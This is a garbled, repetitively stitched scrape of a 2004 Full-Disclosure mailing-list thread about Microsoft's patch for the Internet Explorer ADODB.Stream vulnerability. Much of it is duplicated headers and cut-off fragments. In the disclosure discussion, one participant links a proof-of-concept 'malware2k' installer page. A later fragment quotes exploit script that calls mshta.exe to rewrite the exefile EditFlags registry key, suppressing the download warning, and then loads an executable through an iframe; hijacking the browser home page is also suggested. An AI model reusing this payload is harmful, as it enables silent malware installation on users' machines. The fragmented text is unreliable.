Matthew Murphy wrote:
snip
Well, the problem with ADODB.Stream wasn't executing files, it was writing
them to disk. ...
Exactly.
ADODB.Stream is just doing what it is supposed to. The problem is
that code loaded from the Internet zone is just not supposed to be
allowed to get access to
]
[mailto:[EMAIL PROTECTED] On
Behalf Of Helmut Hauser
Sent: vrijdag 2 juli 2004 18:39
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Fix for IE ADODB.Stream
vulnerability is out
http://www.microsoft.com/downloads/details.aspx?displaylang=enFamilyID=4d05
6748-c538-46f6-b7c8
http://www.microsoft.com/downloads/details.aspx?displaylang=enFamilyID=4d056748-c538-46f6-b7c8-2fbfd0d237e3
Better late than never ...
Helmut Hauser
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
http://www.microsoft.com/downloads/details.aspx?displaylang=enFamilyID=4d05
6748-c538-46f6-b7c8-2fbfd0d237e3
Better late than never ...
Helmut Hauser
___
Full-Disclosure - We believe
Sent: vrijdag 2 juli 2004 18:39
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
http://www.microsoft.com/downloads/details.aspx?displaylang=enFamilyID=4d05
6748-c538-46f6-b7c8-2fbfd0d237e3
Better late than never ...
Helmut Hauser
:[EMAIL PROTECTED] On Behalf Of William Warren
Sent: vrijdag 2 juli 2004 20:47
To: Jelmer
Cc: 'Helmut Hauser'; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
this returns an error..is that all it is supposed to do?
Jelmer wrote:
Too bad it won't do
PROTECTED]
Subject: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
this returns an error..is that all it is supposed to do?
Jelmer wrote:
Too bad it won't do you one ounce any good
http://62.131.86.111/security/idiots/malware2k/installer.htm
Credit: http-equiv
-Original
: http-equiv
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Helmut Hauser
Sent: vrijdag 2 juli 2004 18:39
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
http://www.microsoft.com
]
[mailto:[EMAIL PROTECTED] On Behalf Of William Warren
Sent: vrijdag 2 juli 2004 20:47
To: Jelmer
Cc: 'Helmut Hauser'; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is out
this returns an error..is that all it is supposed to do?
Jelmer wrote:
Too bad
]
[mailto:[EMAIL PROTECTED] On Behalf Of William
Warren
Sent: vrijdag 2 juli 2004 20:47
To: Jelmer
Cc: 'Helmut Hauser'; [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] Fix for IE ADODB.Stream vulnerability is
out
this returns an error..is that all it is supposed to do?
Jelmer wrote
Jelmer writes:
Because we avoid the adodb.stream issue all together,
You can patch it, but if you leave open other issues, well it's pointless
Instead we just swap in this instead of the old shellcode:
[snip PoC]
Well, the problem with ADODB.Stream wasn't executing files, it was writing
them
!--
The real fault doesn't belong with individual components
(ADODB.Stream included), and I think the almost rant-like posts
of Drew Copeley and HTTP-EQUIV miss this fact. ADODB.Stream
does *not* represent a vulnerability, although it does act to
significantly worsen the impact of an
!--
ActiveXObject(Shell.Application);
obj.ShellExecut(mshta.exe,about:scriptvar wsh=new
ActiveXObject('WScript.Shell');wsh.RegWrite
('HKCR\exefile\EditFlags', 0x3807, REG_BINARY);)
/scriptiframe src=foo.exe);
--
On quick reflection, I completely missed Matthew's point. It's
still have to contend with mshta.exe calling out through the
iframe and more than likely firewalled long ago, so use it to
write the registry to kill the download warning, then use it set
the browser home page as http://www/foo.exe, that or the
default search engine.
tons of
14 matches
Mail list logo